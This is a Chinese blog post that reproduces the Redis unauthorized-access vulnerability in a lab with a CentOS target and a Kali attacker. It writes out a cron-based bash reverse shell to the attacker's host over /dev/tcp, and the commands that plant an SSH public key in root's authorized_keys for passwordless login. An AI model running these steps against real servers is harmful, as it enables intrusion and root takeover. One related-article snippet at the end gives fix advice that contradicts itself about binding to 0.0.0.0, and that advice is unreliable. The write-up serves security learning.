Redis未授权访问

最新推荐文章于 2024-02-26 19:40:54 发布
最新推荐文章于 2024-02-26 19:40:54 发布
阅读量941 收藏 1
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_63960760/article/details/132570139
版权

漏洞介绍:

redis默认情况下,会绑定在0.0.0.0:6379,如果没有采用相关的策略,比如添加防火墙规则避免其他非信任来源ip访问等,这样将会将Redis服务暴露在公网上,如果在没有设置密码认证的情况下,会导致任意用户在可以访问目标服务器的情况下未授权访问Redis以及读取Redis的数据。攻击者在未授权访问Redis的情况下,利用Redis自身提供的config命令,可以进行写文件操作,攻击者可以成功将自己的ssh公钥写入目标服务器的/root/.ssh/authotrized_keys文件中,进而可以使用对应私钥直接使用ssh服务登录目标服务器。

实验环境

靶机:Centos7  
攻击机:kali

漏洞复现

安装redis数据库

命令: wget http://download.redis.io/releases/redis-3.2.0.tar.gz

791374ad23dd3c68a6f007191a79414.png
提示没有安装wget 首先安装wget

yum install -y wget

之后重新输入命令下载压缩包
e2fb48eea3a3b2335b9462c0beaa7e8.png
将安装包下载之后 解压缩到当前目录

tar xzf redis-3.2.0.tar.gz

之后进入解压缩目录
编译

make

发现在编译过程中报错 提示未发现gcc命令
a7b1a04ac1c4e5f5fce850384db7f63.png
安装gcc

yum install -y gcc

安装gcc后成功编译
修改redis.conf配置文件
a7bc9116c4b74ce353bfefdd2527552.png
在bind 127.0.0.1前面加上#注释
允许其他机器访问redis服务
将保护模式改为no
即也是允许外联
6821a9bca117e478ac0610a5ba7ebcd.png
之后启动redis服务

./src/redis-server redis.conf

82fd87655121f06be6f7501a901a273.png

连接redis

使用kali进行连接

redis-cli -h 192.168.175.135

可能会连接失败
连接失败时
关闭redis所在系统的防火墙
7a78fbe0c02cdffd748c0e2141dd524.png
关闭后kali连接成功2948b664f3e20302fdf700d38909e88.png
reids相关命令:

192.168.63.130:6379>info  //查看redis版本信息、一些具体信息、服务器版本信息等等
192.168.63.130:6379>set x "test"  //将x的值设置为test
192.168.63.130:6379>flushall    //把整个数据库删除
192.168.63.130:6379>KEYS *  //查看所有键
192.168.63.130:6379>CONFIG GET dir   //获取redis默认的目录
192.168.63.130:6379>CONFIG GET dbfilename  //获取rdb文件名

反弹shell

在kali中监听7999端口

nc -lnvp 7999

在kali中 连接redis服务后
运行以下命令

root@kali:~# redis-cli -h 192.168.175.135
192.168.175.135:6379> set x "\n* * * * * bash -i >& /dev/tcp/192.168.175.129/7999 0>&1\n"
OK
#动态配置 redis 文件持久化路径,并执行持久化命令
#/var/spool/cron/ 目录为定时任务目录
192.168.175.135:6379> config set dir /var/spool/cron/
OK
#root 对应的是 /var/spool/cron 定时任务目录下的子目录,该目录下的定时任务是以用户为纬度存储的,所以这里保存的目录名称应该是当前登录的用户名 root
192.168.175.135:6379> config set dbfilename root
OK
192.168.175.135:6379> save
OK

558bf79ba5618e722108a4da70b0566.png
等待一分钟,查看kali是否监听到redis
监听成功
用户权限为root用户
8fe5c13a55ae9c1414ab7879f20fd15.png
841f2ecacba2c53bef3db79b0b00fa4.png

使用ssh登录靶机

攻击机和靶机打开 SSH服务

systemctl start ssh(没有的话用apt命令安装)

在目标机创建SSH公钥可写目录

mkdir /root/.ssh   //ls -al

清空攻击机/root/.ssh目录下的文件,方便区分一会要生成并存放进其中的SSH公钥文件:rm -rf*
在攻击机生成SSH公钥(需要连续敲击三下回车)

ssh-keygen -t rsa

在攻击机上切换至公钥存放目录:cd /root/.ssh
image.png
将公钥写入test.txt(前后用\n,避免和redis里其他缓存数据混合,不用会一直失败)

(echo "\n\n";cat /root/.ssh/id_rsa_pub)>test.txt

将1.txt的文本内容带入登录目标机redis服务器的过程中,后续可以直接在目标机上设置目标文件并写入

 cat 1.txt | redis-cli -h 目标IP -x set crack

使用redis-cli -h 目标IP 连接目标机器并执行以下命令将本地SSH公钥写入目标机

config set dir /root/.ssh        //将本地公钥写入redis机器中
config get dir   
config set dbfilename authorized_keys 		//设置保存文件名为authorized_keys
save

在攻击机使用ssh免密登录

cd /root/.ssh
ssh -i id_rsa root@目标IP

image.png

参考文章:

https://blog.csdn.net/m0_56798435/article/details/123584134

别忘跟我玩
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
redis_授权访问
scu_hacker博客
01-13 7687
本文介绍redis授权访问的4种利用方式
关于Redis授权访问漏洞利用的介绍与修复建议
01-21
Redis 默认情况下,会绑定在 0.0.0.0:6379,这样将会将 Redis 服务暴露到公网上,如果在没有开启认证的情况下,可以导致任意用户在可以访问目标服务器的情况下授权访问 Redis 以及读取 Redis 的数据。攻击者在...
redis授权访问漏洞(三种方法)
网安小白的博客
08-30 4016
redis授权访问复现,含写入webshell、linux计划任务反弹shell、写入ssh公钥实现ssh登录三种方法~
Redis授权访问漏洞详解(全面)
最新发布
m0_64481831的博客
02-26 1199
Redis是一款内存高速缓存的数据库,是一款K-V型数据库,它的所有键值都是用字典来存储的。其中它的value支持多种数据类型,包括String、List、Set、Zset和Hash。Redis默认情况下绑定在127.0.0.1:6379,在没有进行采用相关的策略,如添加防火墙规则避免其他非信任来源ip访问,就会将Redis服务暴露在公网上;并且Redis默认情况是空密码连接在服务器以root身份运行Redis时这将导致任意用户可以访问目标服务器下授权访问Redis以及读取Redis数据。
redis授权访问
weixin_65219040的博客
06-18 8893
redis
redis授权访问漏洞
热门推荐
jiji_king的博客
07-07 1万+
个人笔记
Redis授权访问配合SSH key文件利用详解
01-19
Redis 授权访问的问题是一直存在的问题,知道创宇安全研究团队历史上也做过相关的应急,今日,又出现 Redis 授权访问配合 SSH key 文件被利用的情况,导致一大批 Redis 服务器被黑,今天我们来简要的分析下。...
Celery 4.0 Redis授权访问+Pickle反序列化利用(celery3_redis_unauth)POC
09-29
Celery 4.0 Redis授权访问+Pickle反序列化利用(celery3_redis_unauth)exploit Celery 版本默认使用Pickle进行任务消息的序列化传递,当所用队列服务(比如Redis、RabbitMQ、RocketMQ等等等)存在授权访问问题...
redis授权访问检测脚本.py
02-11
python编写的redis授权访问漏洞检测脚本
1120362990#Paper#redis授权访问1
07-25
将生成的目录保存到 kitty.txt远程登陆redis命令获得当前备份路径的命令设置备份路径的命令config set dir /root/.ssh设置上传公
E044-服务漏洞利用及加固-利用redis授权访问漏洞进行提权.pdf
12-02
E044-服务漏洞利用及加固-利用redis授权访问漏洞进行提权
redis数据库的GitHub poc流量包
07-16
redis授权访问流量包配合复现文章使用
常见授权访问漏洞总结1
08-04
漏洞简介以及危害config set dir /var/spool/cron
99-web漏洞挖掘之授权访问漏洞1
08-03
1、Redis授权访问 3、MongoDB授权访问 4、ZooKeeper 授权访问 5、Elasticsearch 授权访问 6、Memcache
授权访问漏洞-Redis授权访问漏洞
HAKUNAMATATATTA的博客
11-29 2879
授权访问漏洞可以理解为需要安全配置或权限认证的地址、授权页面配置不当导 致其他用户可以无需认证授权直接访问从而引发重要权限可被操作、数据库或网站目录等敏感信息泄露。Redis 是完全开源免费的,一个灵活的高性能 key-value 数据结构存储,可以用来作为数据库、缓存和消息队列。
redis授权访问漏洞修复
11-03
为修复Redis授权访问漏洞,可以采取以下措施: ``` 代码块1: 1. 修改redis.conf配置文件,将bind 127.0.0.1改为bind 0.0.0.0,这样Redis只会监听本机的IP地址,而不是所有的IP地址。 2. 设置Redis密码,可以在redis.conf配置文件中设置requirepass参数,或者在Redis启动后使用config set命令设置。 3. 使用iptables等防火墙软件,限制Redis服务只能被信任的IP地址访问。 ``` 相关问题:

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值